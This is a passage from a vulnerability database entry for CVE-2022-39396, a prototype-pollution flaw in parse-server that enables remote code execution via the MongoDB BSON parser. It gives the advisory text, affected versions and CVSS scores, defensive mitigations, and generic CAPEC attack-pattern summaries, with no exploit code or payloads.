"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-PRM5-8G2M-24GG
Vulnerability from github – Published: 2022-11-08 17:29 – Updated: 2022-11-09 00:04Impact
An attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser.
Patches
Prevent prototype pollution in MongoDB database adapter.
Workarounds
Disable remote code execution through the MongoDB BSON parser.
Collaborators
Mikhail Shcherbakov (KTH), Cristian-Alexandru Staicu (CISPA) and Musard Balliu (KTH) working with Trend Micro Zero Day Initiative
References
- https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.10.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-39396"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-08T17:29:16Z",
"nvd_published_at": "2022-11-10T01:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nAn attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. \n\n### Patches\n\nPrevent prototype pollution in MongoDB database adapter.\n\n### Workarounds\n\nDisable remote code execution through the MongoDB BSON parser.\n\n### Collaborators\n\nMikhail Shcherbakov (KTH), Cristian-Alexandru Staicu (CISPA) and Musard Balliu (KTH) working with Trend Micro Zero Day Initiative\n\n### References\n\n- https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg\n",
"id": "GHSA-prm5-8g2m-24gg",
"modified": "2022-11-09T00:04:54Z",
"published": "2022-11-08T17:29:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39396"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/8295"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/8296"
},
{
"type": "PACKAGE",
"url": "https://github.com/parse-community/parse-server"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/releases/tag/4.10.18"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/releases/tag/5.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Remote code execution via MongoDB BSON parser through prototype pollution"
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.